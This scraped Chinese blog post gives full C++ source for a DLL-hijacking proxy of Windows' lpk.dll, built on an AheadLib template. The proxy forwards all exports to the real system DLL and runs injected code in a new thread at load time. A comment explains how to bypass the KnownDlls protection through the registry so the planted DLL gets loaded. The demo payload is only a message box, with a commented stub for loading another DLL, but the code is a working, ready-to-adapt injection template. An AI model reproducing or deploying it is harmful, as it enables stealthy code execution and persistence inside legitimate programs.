zoukankan      html  css  js  c++  java
  • DLL hijecking LPK

    lpk.dll代码

    // lpk.cpp : Defines the entry point for the DLL application.
    //在HKEY_LOCAL_MACHINESystemCurrentControlSetControlSessionManager添加一个键值ExcludeFromKnownDlls(多字符串类型),把lpk.dll加进去。如果需要其他DLL请自行加入。
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 头文件
    #include "stdafx.h"
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    #include <process.h>
    #include<Windows.h>
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 导出函数
    #pragma comment(linker, "/EXPORT:LpkInitialize=_AheadLib_LpkInitialize,@1")
    #pragma comment(linker, "/EXPORT:LpkTabbedTextOut=_AheadLib_LpkTabbedTextOut,@2")
    #pragma comment(linker, "/EXPORT:LpkDllInitialize=_AheadLib_LpkDllInitialize,@3")
    #pragma comment(linker, "/EXPORT:LpkDrawTextEx=_AheadLib_LpkDrawTextEx,@4")
    //#pragma comment(linker, "/EXPORT:LpkEditControl=_AheadLib_LpkEditControl,@5")
    #pragma comment(linker, "/EXPORT:LpkExtTextOut=_AheadLib_LpkExtTextOut,@6")
    #pragma comment(linker, "/EXPORT:LpkGetCharacterPlacement=_AheadLib_LpkGetCharacterPlacement,@7")
    #pragma comment(linker, "/EXPORT:LpkGetTextExtentExPoint=_AheadLib_LpkGetTextExtentExPoint,@8")
    #pragma comment(linker, "/EXPORT:LpkPSMTextOut=_AheadLib_LpkPSMTextOut,@9")
    #pragma comment(linker, "/EXPORT:LpkUseGDIWidthCache=_AheadLib_LpkUseGDIWidthCache,@10")
    #pragma comment(linker, "/EXPORT:ftsWordBreak=_AheadLib_ftsWordBreak,@11")
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 宏定义
    #define EXTERNC extern "C"
    #define NAKED __declspec(naked)
    #define EXPORT __declspec(dllexport)
    
    #define ALCPP EXPORT NAKED
    #define ALSTD EXTERNC EXPORT NAKED void __stdcall
    #define ALCFAST EXTERNC EXPORT NAKED void __fastcall
    #define ALCDECL EXTERNC NAKED void __cdecl
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    //LpkEditControl导出的是数组,不是单一的函数(by Backer)
    EXTERNC void __cdecl AheadLib_LpkEditControl(void);
    EXTERNC __declspec(dllexport) void(*LpkEditControl[14])() = { AheadLib_LpkEditControl };
    
    ////////////////////////////////////////////////////////////////////////////////////////////////  
    //添加全局变量
    
    ////////////////////////////////////////////////////////////////////////////////////////////////  
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // AheadLib 命名空间
    namespace AheadLib
    {
        HMODULE m_hModule = NULL;    // 原始模块句柄
    
        // 加载原始模块
        inline BOOL WINAPI Load()
        {
            TCHAR tzPath[MAX_PATH];
            TCHAR tzTemp[MAX_PATH * 2];
    
            GetSystemDirectory(tzPath, MAX_PATH);
            //MessageBox(NULL, tzPath, "path", MB_OK);
            //GetCurrentDirectory(MAX_PATH, tzPath);
            lstrcat(tzPath, TEXT("\lpk.dll"));
            m_hModule = LoadLibrary(tzPath);
            if (m_hModule == NULL)
            {
                wsprintf(tzTemp, TEXT("无法加载 %s,程序无法正常运行。"), tzPath);
                MessageBox(NULL, tzTemp, TEXT("AheadLib"), MB_ICONSTOP);
            };
            //MessageBox(NULL, "原始模块加载成功", TEXT("AheadLib"), MB_ICONSTOP);
            return (m_hModule != NULL);
        }
    
        // 释放原始模块
        inline VOID WINAPI Free()
        {
            if (m_hModule)
            {
                FreeLibrary(m_hModule);
            }
        }
    
        // 获取原始函数地址
        FARPROC WINAPI GetAddress(PCSTR pszProcName)
        {
            FARPROC fpAddress;
            CHAR szProcName[16];
            TCHAR tzTemp[MAX_PATH];
    
            fpAddress = GetProcAddress(m_hModule, pszProcName);
            if (fpAddress == NULL)
            {
                if (HIWORD(pszProcName) == 0)
                {
                    wsprintf(szProcName, "%d", pszProcName);
                    pszProcName = szProcName;
                }
    
                wsprintf(tzTemp, TEXT("无法找到函数 %hs,程序无法正常运行。"), pszProcName);
                MessageBox(NULL, tzTemp, TEXT("AheadLib"), MB_ICONSTOP);
                ExitProcess(-2);
            }
    
            return fpAddress;
        }
    }
    using namespace AheadLib;
    ////////////////////////////////////////////////////////////////////////////////////////////////  
    
    ////////////////////////////////////////////////////////////////////////////////////////////////  
    //函数声明
    void WINAPIV Init(LPVOID pParam);
    ////////////////////////////////////////////////////////////////////////////////////////////////  
    
    void WINAPIV Init(LPVOID pParam)
    {
        //在这里添加DLL加载代码
    //    LoadLibrary(TEXT(".\MFC_DLL.dll"));
        MessageBox(NULL, "lpkdll劫持成功", "lpkk劫持", MB_OK);
        return;
    }
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 入口函数
    BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
    {
        if (dwReason == DLL_PROCESS_ATTACH)
        {
            DisableThreadLibraryCalls(hModule);
            if (Load())
            {
                //LpkEditControl这个数组有14个成员,必须将其复制过来    
                memcpy((LPVOID)(LpkEditControl + 1), (LPVOID)((int*)GetAddress("LpkEditControl") + 1), 52);
                _beginthread(Init, NULL, NULL);
            }
            else{
            //    MessageBox(NULL, "初始化失败", "123 ERROR", MB_ICONSTOP);
                return FALSE;
            }
                
        }
        else if (dwReason == DLL_PROCESS_DETACH)
        {
            Free();
        }
        return TRUE;
    }
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 导出函数
    ALCDECL AheadLib_LpkInitialize(void)
    {
        GetAddress("LpkInitialize");
        __asm JMP EAX;
    }
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 导出函数
    ALCDECL AheadLib_LpkTabbedTextOut(void)
    {
        GetAddress("LpkTabbedTextOut");
        __asm JMP EAX;
    }
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 导出函数
    ALCDECL AheadLib_LpkDllInitialize(void)
    {
        GetAddress("LpkDllInitialize");
        __asm JMP EAX;
    }
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 导出函数
    ALCDECL AheadLib_LpkDrawTextEx(void)
    {
        GetAddress("LpkDrawTextEx");
        __asm JMP EAX;
    }
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 导出函数
    ALCDECL AheadLib_LpkEditControl(void)
    {
        GetAddress("LpkEditControl");
        __asm jmp DWORD ptr[EAX];//这里的LpkEditControl是数组,eax存的是函数指针
    }
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 导出函数
    ALCDECL AheadLib_LpkExtTextOut(void)
    {
        GetAddress("LpkExtTextOut");
        __asm JMP EAX;
    }
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 导出函数
    ALCDECL AheadLib_LpkGetCharacterPlacement(void)
    {
        GetAddress("LpkGetCharacterPlacement");
        __asm JMP EAX;
    }
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 导出函数
    ALCDECL AheadLib_LpkGetTextExtentExPoint(void)
    {
        GetAddress("LpkGetTextExtentExPoint");
        __asm JMP EAX;
    }
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 导出函数
    ALCDECL AheadLib_LpkPSMTextOut(void)
    {
        GetAddress("LpkPSMTextOut");
        __asm JMP EAX;
    }
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 导出函数
    ALCDECL AheadLib_LpkUseGDIWidthCache(void)
    {
        GetAddress("LpkUseGDIWidthCache");
        __asm JMP EAX;
    }
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    
    
    
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // 导出函数
    ALCDECL AheadLib_ftsWordBreak(void)
    {
        GetAddress("ftsWordBreak");
        __asm JMP EAX;
    }
    ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  • 相关阅读:
    面试8:找二叉树的下个结点
    面试8:找二叉树的下个结点
    面试题7:重建二叉树
    面试题7:重建二叉树
    Kenneth A.Lambert著的数据结构(用python语言描述)的第一章课后编程答案
    基础的Mapgis三维二次开发-插件式
    面试题6:从尾到头打印链表
    C语言中声明和定义详解(待看。。
    面试题5:替换空格
    面试题5:替换空格
  • 原文地址:https://www.cnblogs.com/p20050001/p/8760725.html
Copyright © 2011-2022 走看看